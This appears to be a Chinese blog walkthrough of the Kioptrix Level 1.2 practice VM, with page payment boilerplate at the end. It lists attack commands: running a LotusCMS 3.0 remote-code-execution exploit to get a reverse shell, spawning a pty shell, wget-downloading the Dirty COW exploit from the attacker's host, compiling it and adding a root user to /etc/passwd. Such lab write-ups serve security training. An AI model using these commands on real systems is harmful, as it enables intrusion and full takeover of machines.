Kioptrix_Level1.2靶机

IP扫描

端口扫描

发现为 LotusCMS

目录扫描

使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞

使用exp

GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit

构造payload

python lotuscms.py -rh 192.168.70.153 -rp 80 -lh 192.168.70.132

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

使用命令 uname -a查看靶机的内核版本信息

Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

使用命令cat /etc/*-release查看靶机的发行版本信息为

使用searchsploit查找符合内核版本和发行版本的历史漏洞

直接使用脏牛漏洞

开启8000端口

靶机下载exp

wget http://192.168.70.132:8000/40839.c

编译exp并运行

gcc -pthread 40839.c -o 40839 -lcrypt

查看/etc/passwd文件,写入firefart用户

切换为firefart用户,得到root权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值